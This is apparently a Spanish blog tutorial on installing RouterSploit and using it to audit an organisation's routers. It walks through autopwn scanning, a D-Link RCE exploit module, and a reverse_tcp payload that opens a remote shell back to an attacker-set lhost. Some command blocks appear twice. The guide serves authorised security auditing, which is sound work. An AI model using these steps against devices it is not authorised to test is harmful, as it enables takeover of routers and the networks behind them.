Ahorita realizaremos un análisis de vulnerabilidades de los routers de nuestra organización, para ello utilizaremos un Framework Open Source de seguridad llamado RouterSploit, con el se puede realizar auditoria de distintos dispositivos como routers, webcam, equipos NAS, entre otros.
Este framework contiene 5 módulos, que son los siguientes:
1. exploit
2. creds
3. scanners
4. payloads
5. generic
Su función es la siguiente:
1. exploits: Este módulos que aprovechan las vulnerabilidades identificadas.
2. creds: El módulos creds es para probar credenciales en los servicios de red.
3. scanners: Con este módulos se verifica si un objetivo es vulnerable a cualquier exploit.
4. payloads: módulos para generar cargas útiles en diversas arquitecturas.
5. generic: módulos que realizan ataques genéricos.
Ya que conocemos los modulos vamos a proceder a realizar la instalación
Instalación
Para un correcto funcionamiento de RouterSploit se necesita instalar los siguientes paquetes:
- future
- requests
- paramiko
- pysnmp
- pycrypto
- bluepy (opcional)
#apt install future requests paramiko pysnmp pycrypto
Ahora se procede a la instalación de pip en Python3
#apt install python3-pip
Clonación del RouterSploit
git clone https://www.github.com/threat9/routersploit
Nos posicionamos en él directorio.
Una vez que se descomprime el archivo descargado entramos en la carpeta
cd routersploit
Instalamos los requisitos.
python3 -m pip install -r requirements.txt
Ejecución de RouterSploit
python3 rsf.py
python3 rsf.py
Como usar RouterSploit
Para comenzar a utilizar el RouterSploit debes conocer la ip de los dispositivos que vas auditar
Comandos iniciales
Una vez que se inicia el RouterSploit, se procede a seleccionar el modulo scanner con autopwn (Esto lanzara todos los exploit contra el objetivo)
use scanner/autopwn
Para comenzar a utilizar el RouterSploit debes conocer la ip de los dispositivos que vas auditar
Comandos iniciales
Una vez que se inicia el RouterSploit, se procede a seleccionar el modulo scanner con autopwn (Esto lanzara todos los exploit contra el objetivo)
use scanner/autopwn
Luego se procede a marcar el objetivo
set target [IP-DISPOSITIVO]
Se procede a realizar el attack del dispositivo
Colocamos el siguiente comando
run
Colocamos el siguiente comando
run
Una vez finalizado el chek del dispositivo mostrara si posee vulnerabilidades y cual es el exploits para esa vulnerabilidad, para esto se debe utilizar los siguientes comando
Comando use exploits/routers/marca_routers/codigo_exploits
Uso del exploit para el objetivo
use exploits/routers/dlink/dls_2750b_rce
Comando para colocar exploits en el objetivo
set target ip
Comando use exploits/routers/marca_routers/codigo_exploits
Uso del exploit para el objetivo
use exploits/routers/dlink/dls_2750b_rce
Comando para colocar exploits en el objetivo
set target ip
Ejemplo
set target 192.168.1.1
Verificamos la vulnerabilidad del objetivo check
Atacamos run
Consultamos la carga realizada show payloads
Colocamos el payloads reverse_tcp y consultamos las opciones
set payloads reverse_tcp
show options
Cargamos la ip del host donde queremos hacer el ataque
set lhost 192.168.1.10
Atacamosrun
Una vez listo podemos colocar un pwd o ls y listamos los directorios
Posteriormente salimos
exit
Como actualizar RouterSploit
Nos ubicamos en el directorio
cd routersploit
Una vez en el directorio realizamos un pull para actualizar los paquetes
git pull
No hay comentarios:
Publicar un comentario